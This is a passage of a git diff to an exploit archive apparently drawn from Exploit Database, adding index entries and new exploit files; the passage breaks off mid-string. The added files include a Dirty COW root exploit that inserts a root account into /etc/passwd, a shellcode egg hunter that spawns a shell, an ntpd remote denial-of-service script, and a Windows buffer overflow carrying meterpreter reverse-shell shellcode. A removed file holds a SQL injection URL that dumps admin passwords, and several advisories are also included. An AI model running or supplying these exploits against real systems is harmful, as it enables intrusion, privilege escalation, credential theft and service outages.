36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 -36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 +36159,platforms/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 @@ -36199,7 +36212,7 @@ id,file,description,date,author,platform,type,port 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 -39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 +39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 @@ -36817,3 +36830,5 @@ id,file,description,date,author,platform,type,port 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0 +40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0 +40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080 diff --git a/platforms/android/remote/40846.html b/platforms/android/remote/40846.html new file mode 100755 index 000000000..acbe42c9f --- /dev/null +++ b/platforms/android/remote/40846.html @@ -0,0 +1,345 @@ + + +
+ + \ No newline at end of file diff --git a/platforms/hardware/webapps/40837.txt b/platforms/hardware/webapps/40837.txt new file mode 100755 index 000000000..5143fb714 --- /dev/null +++ b/platforms/hardware/webapps/40837.txt @@ -0,0 +1,157 @@ +Document Title: +=============== +Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=1990 + + +Release Date: +============= +2016-11-28 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1990 + + +Common Vulnerability Scoring System: +==================================== +3.5 + + +Abstract Advisory Information: +============================== +The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application. + + +Vulnerability Disclosure Timeline: +================================== +2016-11-28: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers. +The vulnerability allows remote attackers and local privileged account to inject malicious script codes +on the application-side to manipulate the router dhcp hostnames. + +Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying +the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side +on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the +web gui are affected by the security vulnerability. Remote attackers can for example make special crafted +malicious pages with POST method requests to manipulate the dhcp hostname listing and client view. + +The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. +Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction. +Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect +to malicious sources and persistent manipulation of affected or connected web module context. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] DHCP Client List +[+] DHCP settings + +Vulnerable Parameter(s): +[+] Hostnames + + +Proof of Concept (PoC): +======================= +Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manaul steps to reproduce the vulnerability ... (local) +1. Open the Router UI +2. Login as basic account +3. Open the DHCP List module via settings +4. Inject a payload to the hostnames input field +5. Save the input +6. Now the list becomes visible with all clients and the payload executes within the context +7. Successful reproduce of the vulnerability! + +The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload. +Save the file into vulnerablity.sh, then chmod +x vulnerability.sh. + +PoC: Exploit +#!/bin/bash +GREEN=$(tput setaf 2 && tput bold) +BLUE=$(tput setaf 6 && tput bold) +echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers" +echo $GREEN"[+] Vulnerability founded by : Lawrence Amer " +echo -n $BLUE"[~] type XSS Payload here :" +read -e xss +echo $xss > /etc/hostname +echo $GREEN"[+]DHCP HOST NAME IS WRITTEN" + + +Video: https://www.youtube.com/watch?v=HUM5myJWbvc + + +Solution - Fix & Patch: +======================= +The xss vulnerability can be patched by a secure parse of the hostnames client parameters. +Restrict the input and disallow the usage of special chars to prevent the injection point. +Parse as well the hostnames output location in the active dhcp clients list. + + +Security Risk: +============== +The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer) + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark +of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + diff --git a/platforms/java/webapps/40842.txt b/platforms/java/webapps/40842.txt new file mode 100755 index 000000000..719c7305d --- /dev/null +++ b/platforms/java/webapps/40842.txt @@ -0,0 +1,77 @@ +Security Advisory @ Mediaservice.net Srl +(#05, 23/11/2016) Data Security Division + + Title: Red Hat JBoss EAP deserialization of untrusted data + Application: JBoss EAP 5.2.X and prior versions + Description: The application server deserializes untrusted data via the + JMX Invoker Servlet. This can lead to a DoS via resource + exhaustion and potentially remote code execution. + Author: Federico Dotta + Maurizio Agazzini + Vendor Status: Will not fix + CVE Candidate: The Common Vulnerabilities and Exposures project has assigned + the name CVE-2016-7065 to this issue. + References: http://lab.mediaservice.net/advisory/2016-05-jboss.txt + http://lab.mediaservice.net/code/jboss_payload.zip + https://bugzilla.redhat.com/show_bug.cgi?id=1382534 + +1. Abstract. + +JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The +communication employs serialized Java objects, encapsulated in HTTP +requests and responses. + +The server deserializes these objects without checking the object type. This +behavior can be exploited to cause a denial of service and potentially +execute arbitrary code. + +The objects that can cause the DoS are based on known disclosed payloads +taken from: + +- https://gist.github.com/coekie/a27cc406fc9f3dc7a70d + +Currently there is no known chain that allows code execution on JBoss EAP, +however new chains are discovered every day. + +2. Example Attack Session. + +Submit an authenticated POST request to the JMX Invoker Servlet URL (for +example: http://localhost:8080/invoker/JMXInvokerServlet) with one of the +following objects in the body of the request: + + * 01_BigString_limited.ser: it's a string object; the server will + reply in a normal way (object size similar to the next one). + * 02_SerialDOS_limited.ser: the application server will require + about 2 minutes to execute the request with 100% CPU usage. + * 03_BigString.ser: it's a string object; the server will + reply in a normal way (object size similar to the next one). + * 04_SerialDOS.ser: the application server will require an + unknown amount of time to execute the request with 100% CPU usage. + +3. Affected Platforms. + +This vulnerability affects versions 4 and 5 of JBoss EAP. + +4. Fix. + +Red Hat will not fix the issue because JBoss EAP 4 is out of maintenance +support and JBoss EAP 5 is close to the end of its maintenance period. + +5. Proof Of Concept. + +See jboss_payload.zip (40842.zip) and Example Attack Session above. + +http://lab.mediaservice.net/code/jboss_payload.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip + +6. Timeline + +06/10/2016 - First communication sent to Red Hat Security Response Team +07/10/2016 - Red Hat Security Response Team response, Bug 1382534 +23/11/2016 - Security Advisory released + +Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip diff --git a/platforms/lin_x86/shellcode/40827.c b/platforms/lin_x86/shellcode/40827.c index 3692ee9f1..dcbf6330f 100755 --- a/platforms/lin_x86/shellcode/40827.c +++ b/platforms/lin_x86/shellcode/40827.c @@ -1,45 +1,60 @@ /* -;author: Filippo "zinzloun" Bersani -;date: 25/11/2016 -;version 1.0 -;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark +;author: Filippo "zinzloun" Bersani +;date: 28/11/2016 +;version: 1.0 ;X86 Assembly/NASM Syntax -;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit -; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit +; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +; Linux bb32 4.4.0-45-generic 32bit + +; description +; egg hunter shellcode: different approach to the classic jpc technique using fstenv and dynamic memory location +; plus a bit of obfuscation to generate the egg mark + +; POC +; execute a shell + +; see comment for details + global _start + section .text + _start: - fldz ;with this 2 instructions... - fnstenv [esp-0xc] ;set the entry point of my egg (_start) +fldpi +fstenv [esp-0xc] ;fstenv getpc: the entry mem addr of this code (_start) +pop esi ;pop it in esi +xor eax,eax +mov al, 0x1f ;set the offset bytes to point at the end of the program +add esi, eax ;set the mem addr dinamically - pop esi ;get the entry point addr... - lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter - - mov edx, dword 0x65676760 ;a dumm value.. - rol edx, 0x4 ;...to get the real egg mark: 56767606 +set_mark: + mov edx, dword 0x65676760 ;a dumm value.. + rol edx, 0x4 ;get the real mark: 56767606 find_egg: - inc esi ;scan the next section of memory after this code - cmp [esi], edx ;check if we have found the egg... - jz find_egg ;loop - call esi ;egg found (zero flag is set), jump to the address to exec the shell code - */ - + add esi,4 ;scan the next section of mem, since we are in 32 arch we need to add 4 bytes + cmp[esi], edx ;check if we have found the egg... + jz find_egg ;loop + call esi ;found our egg (zero flag is set), jump to the execution of the shellcode +*/ + #include #include unsigned char egg_hunter[] = \ -"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6"; +"\xd9\xeb\x9b\xd9\x74\x24\xf4\x5e\x31\xc0\xb0\x1f\x01\xc6\xba\x60\x67\x67\x65\xc1\xc2\x04\x83\xc6\x04\x39\x16\x74\xf9\xff\xd6"; //the actual egg hunter code unsigned char shell_code[] = \ +"\x31\xc0\xb0\x05\xfe\xc0\xfe\xc8\xb0\x06\x90" //dumm instructions "\x06\x76\x76\x56" // egg id reversed -"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // /bin/bash main() { printf("Egg hunter length: %d\n", strlen(egg_hunter)); - printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); + printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); int (*ret)() = (int(*)())egg_hunter; ret(); -} +} \ No newline at end of file diff --git a/platforms/linux/dos/40840.py b/platforms/linux/dos/40840.py new file mode 100755 index 000000000..5151dffb7 --- /dev/null +++ b/platforms/linux/dos/40840.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python + +# Exploit Title: ntpd 4.2.8p3 remote DoS +# Date: 2015-10-21 +# Bug Discovery: John D "Doug" Birdwell +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: http://support.ntp.org/bin/view/Main/NtpBug2922 +# Vendor Homepage: http://www.ntp.org/ +# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz +# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77 +# CVE: CVE-2015-7855 + +import sys +import socket + +if len(sys.argv) != 3: + print "usage: " + sys.argv[0] + " " + sys.exit(-1) + +payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39" + +print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..." +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) +print "[+] Done!" + diff --git a/platforms/linux/local/40838.c b/platforms/linux/local/40838.c new file mode 100755 index 000000000..b7d8379b3 --- /dev/null +++ b/platforms/linux/local/40838.c @@ -0,0 +1,72 @@ +// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball +#include //// pikachu +#include //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball +#include //// pokeball +#include //// (___) +#include //// (o o)_____/ +#include //// @@ ` \ +#include //// \ ____, /miltank +#include //// // // +#include //// ^^ ^^ +#include //// mmap bc757000 +#include //// madvise 0 +////////////////////////////////////////////// ptrace 0 +////////////////////////////////////////////// miltank +////////////////////////////////////////////// +int f ;// file descriptor +void *map ;// memory map +pid_t pid ;// process id +pthread_t pth ;// thread +struct stat st ;// file info +////////////////////////////////////////////// +void *madviseThread(void *arg) {// madvise thread + int i,c=0 ;// counters + for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 + c+=madvise(map,100,MADV_DONTNEED) ;// race condition + printf("madvise %d\n\n",c) ;// sum of errors + }// /madvise thread +////////////////////////////////////////////// +int main(int argc,char *argv[]) {// entrypoint + if(argc<3)return 1 ;// ./d file contents + printf("%s \n\ + (___) \n\ + (o o)_____/ \n\ + @@ ` \\ \n\ + \\ ____, /%s \n\ + // // \n\ + ^^ ^^ \n\ +", argv[1], argv[2]) ;// dirty cow + f=open(argv[1],O_RDONLY) ;// open read only file + fstat(f,&st) ;// stat the fd + map=mmap(NULL ,// mmap the file + st.st_size+sizeof(long) ,// size is filesize plus padding + PROT_READ ,// read-only + MAP_PRIVATE ,// private mapping for cow + f ,// file descriptor + 0) ;// zero + printf("mmap %lx\n\n",(unsigned long)map);// sum of error code + pid=fork() ;// fork process + if(pid) {// if parent + waitpid(pid,NULL,0) ;// wait for child + int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) + for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l + for(o=0;o +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +const char *filename = "/etc/passwd"; +const char *backup_filename = "/tmp/passwd.bak"; +const char *salt = "firefart"; + +int f; +void *map; +pid_t pid; +pthread_t pth; +struct stat st; + +struct Userinfo { + char *username; + char *hash; + int user_id; + int group_id; + char *info; + char *home_dir; + char *shell; +}; + +char *generate_password_hash(char *plaintext_pw) { + return crypt(plaintext_pw, salt); +} + +char *generate_passwd_line(struct Userinfo u) { + const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; + int size = snprintf(NULL, 0, format, u.username, u.hash, + u.user_id, u.group_id, u.info, u.home_dir, u.shell); + char *ret = malloc(size + 1); + sprintf(ret, format, u.username, u.hash, u.user_id, + u.group_id, u.info, u.home_dir, u.shell); + return ret; +} + +void *madviseThread(void *arg) { + int i, c = 0; + for(i = 0; i < 200000000; i++) { + c += madvise(map, 100, MADV_DONTNEED); + } + printf("madvise %d\n\n", c); +} + +int copy_file(const char *from, const char *to) { + // check if target file already exists + if(access(to, F_OK) != -1) { + printf("File %s already exists! Please delete it and run again\n", + to); + return -1; + } + + char ch; + FILE *source, *target; + + source = fopen(from, "r"); + if(source == NULL) { + return -1; + } + target = fopen(to, "w"); + if(target == NULL) { + fclose(source); + return -1; + } + + while((ch = fgetc(source)) != EOF) { + fputc(ch, target); + } + + printf("%s successfully backed up to %s\n", + from, to); + + fclose(source); + fclose(target); + + return 0; +} + +int main(int argc, char *argv[]) +{ + // backup file + int ret = copy_file(filename, backup_filename); + if (ret != 0) { + exit(ret); + } + + struct Userinfo user; + // set values, change as needed + user.username = "firefart"; + user.user_id = 0; + user.group_id = 0; + user.info = "pwned"; + user.home_dir = "/root"; + user.shell = "/bin/bash"; + + char *plaintext_pw = getpass("Please enter new password: "); + user.hash = generate_password_hash(plaintext_pw); + char *complete_passwd_line = generate_passwd_line(user); + printf("Complete line:\n%s\n", complete_passwd_line); + + f = open(filename, O_RDONLY); + fstat(f, &st); + map = mmap(NULL, + st.st_size + sizeof(long), + PROT_READ, + MAP_PRIVATE, + f, + 0); + printf("mmap: %lx\n",(unsigned long)map); + pid = fork(); + if(pid) { + waitpid(pid, NULL, 0); + int u, i, o, c = 0; + int l=strlen(complete_passwd_line); + for(i = 0; i < 10000/l; i++) { + for(o = 0; o < l; o++) { + for(u = 0; u < 10000; u++) { + c += ptrace(PTRACE_POKETEXT, + pid, + map + o, + *((long*)(complete_passwd_line + o))); + } + } + } + printf("ptrace %d\n",c); + } + else { + pthread_create(&pth, + NULL, + madviseThread, + NULL); + ptrace(PTRACE_TRACEME); + kill(getpid(), SIGSTOP); + pthread_join(pth,NULL); + } + + printf("Done! Check %s to see if the new user was created\n", filename); + printf("You can log in with username %s and password %s.\n\n", + user.username, plaintext_pw); + printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n", + filename, backup_filename); + return 0; +} \ No newline at end of file diff --git a/platforms/php/webapps/6927.txt b/platforms/php/webapps/6927.txt deleted file mode 100755 index c59e75b67..000000000 --- a/platforms/php/webapps/6927.txt +++ /dev/null @@ -1,44 +0,0 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## AJ ARTICLE ( featured_article.php mode ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRiAN Arab HACkErS -######################## -######################## -## -## Name : AJ ARTICLE -## -## Site : www.ajsquare.com -## -######################## -######################## -## -## -(:: L!VE DEMO ::)- -## -## http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin-- -## -######################## -######################## - - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-11-01] diff --git a/platforms/windows/dos/40841.html b/platforms/windows/dos/40841.html new file mode 100755 index 000000000..51de924da --- /dev/null +++ b/platforms/windows/dos/40841.html @@ -0,0 +1,69 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40843.html b/platforms/windows/dos/40843.html new file mode 100755 index 000000000..ce7927998 --- /dev/null +++ b/platforms/windows/dos/40843.html @@ -0,0 +1,175 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40844.html b/platforms/windows/dos/40844.html new file mode 100755 index 000000000..ab66f442b --- /dev/null +++ b/platforms/windows/dos/40844.html @@ -0,0 +1,55 @@ + + + + + + + + +Window.xhtml + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40845.txt b/platforms/windows/dos/40845.txt new file mode 100755 index 000000000..bbfcaf50b --- /dev/null +++ b/platforms/windows/dos/40845.txt @@ -0,0 +1,65 @@ +Source: http://blog.skylined.nl/20161128001.html + +Synopsis + +A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does not expect, or have code attempt to execute a method of an object using a vftable, when that object does not have a vftable. Successful exploitation can lead to arbitrary code execution. + +Known affected software and attack vectors + +Microsoft Internet Explorer 8, 9, 10 and 11 + +An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path. + +1 Repro.svg: + + + + +1 Target.html: + + + +Description + +In an SVG page, a copy of the has­Feature method of a DOMImplementation object from a HTML page is created. This copy is used as a method of a new object and called with one argument. This can cause at least two issues in the MSHTML!Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT function of MSIE: + +A Failfast exception when the code detects that calling a method of an object has not cleaned up the stack as expected; this is because the called function appears to expect a different number of arguments or a different calling convention. This issue can be triggered by changing the line o.x(); in the repro to o.x(new Array). +An out-of-bounds write when MSHTML!CBase::Private­Get­Disp­ID is called; this is probably caused by a type confusion bug: the code expects a VARIANT object of one type, but is working on an object of a different type. +The repro was tested on x86 systems and does not reproduce this issue on x64 systems. I did not determine if this is because x64 systems are not affected, or because the repro needs to be modified to work on x64 systems. + +Exploit + +Exploitation was not attempted. I reversed Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT only sufficiently to get an idea of the root cause, but not enough to determine exactly what is going on or how to control the issue for command execution. + +2 Repro.html: + + + + +2 Target.html: + + + +Description + +Calling the is­Prototype­Of method of the DOMImplementation interface as a function results in type confusion where an object is assumed to implement IUnknown when in fact it does not. The code attempts to call the Release method of IUnknown through the vftable at offset 0, but since the object has no vftables, a member property is stored at this offset, which appears to have a static value 002dc6c0. An attacker that is able to control this value, or allocate memory and store data at that address, may be able to execute arbitrary code. + +Exploit + +No attempts were made to further reverse the code and determine the exact root cause. A few attempts were made to control the value at offset 0 of the object in question, as well as get another object in its place with a different value at this location, but both efforts were brief and unsuccessful. + +Time-line + +September 2015: This vulnerability was found through fuzzing. +October 2015: This vulnerability was submitted to ZDI. +November 2015: This vulnerability was acquired by ZDI. +February 2016: This issue was addressed by Microsoft in MS16-009. +November 2016: Details of this issue are released. \ No newline at end of file diff --git a/platforms/windows/remote/40830.py b/platforms/windows/remote/40830.py new file mode 100755 index 000000000..271ce07c0 --- /dev/null +++ b/platforms/windows/remote/40830.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "VX Search Enterprise 9.1.12 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 10015BBE + +nseh = "\x90\x90\xEB\x0B" +seh = "\xBE\x5B\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 